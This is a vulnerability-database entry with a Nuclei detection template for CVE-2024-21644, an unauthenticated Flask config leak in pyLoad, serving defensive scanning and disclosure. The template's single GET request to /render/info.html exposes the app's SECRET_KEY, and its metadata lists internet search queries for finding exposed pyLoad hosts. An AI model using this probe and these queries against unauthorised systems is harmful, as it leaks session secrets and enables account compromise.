Lucene search
ProjectDiscoveryNUCLEI:CVE-2024-21644HistoryJan 29, 2024 - 4:33 p.m.
pyLoad Flask Config - Access Control
2024-01-2916:33:24
ProjectDiscovery
github.com
14
cve2024
python
pyload
access control
flask
config
vulnerability
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
0.118 Low
EPSS
Percentile
95.3%
pyLoad is the free and open-source Download Manager written in pure Python. Any unauthenticated user can browse to a specific URL to expose the Flask config, including the `SECRET_KEY` variable. This issue has been patched in version 0.5.0b3.dev77.
id: CVE-2024-21644
info:
name: pyLoad Flask Config - Access Control
author: West-wise
severity: high
description: |
pyLoad is the free and open-source Download Manager written in pure Python. Any unauthenticated user can browse to a specific URL to expose the Flask config, including the `SECRET_KEY` variable. This issue has been patched in version 0.5.0b3.dev77.
remediation: |
Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.
reference:
- https://github.com/advisories/GHSA-mqpq-2p68-46fv
- https://github.com/fkie-cad/nvd-json-data-feeds
- https://nvd.nist.gov/vuln/detail/CVE-2024-21644
- https://github.com/ltranquility/CVE-2024-21644-Poc
- https://github.com/nomi-sec/PoC-in-GitHub
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-21644
cwe-id: CWE-284
epss-score: 0.14751
epss-percentile: 0.95779
cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: pyload
product: pyload
shodan-query:
- html:"pyload"
- http.title:"login - pyload"
- http.html:"pyload"
- http.title:"pyload"
fofa-query:
- title="login - pyload"
- body="pyload"
- title="pyload"
google-query:
- intitle:"login - pyload"
- intitle:"pyload"
zoomeye-query:
- app:"pyLoad"
- app:"pyload"
tags: cve,cve2024,python,pip,pyload,access-control
http:
- method: GET
path:
- "{{BaseURL}}/render/info.html"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "'SECRET_KEY':"
- "'pyload_session'"
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100c36c417506bb3f8110e97a42eed93e6ac5da4f99f506c1998f60c08991af5ffd0220646ccab7ed81816c53a24a7e224f85480706d10c52a4c14fa1a8973115a5d900:922c64590222798bb761d5b6d8e72950Related
cvelist
cvelist
CVE-2024-21644 pyLoad unauthenticated flask configuration leakage
2024-01-08 13:20:55
osv
osv
CVE-2024-21644
2024-01-08 14:15:47
pyload Unauthenticated Flask Configuration Leakage vulnerability
2024-01-08 15:40:39
cve
cve
CVE-2024-21644
2024-01-08 14:15:47
githubexploit
githubexploit
Exploit for Improper Access Control in Pyload
2024-03-30 01:00:31
veracode
veracode
Information Disclosure
2024-01-09 06:36:14
github
github
pyload Unauthenticated Flask Configuration Leakage vulnerability
2024-01-08 15:40:39
prion
prion
Design/Logic Flaw
2024-01-08 14:15:00
nvd
nvd
CVE-2024-21644
2024-01-08 14:15:47
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
0.118 Low
EPSS
Percentile
95.3%
Related for NUCLEI:CVE-2024-21644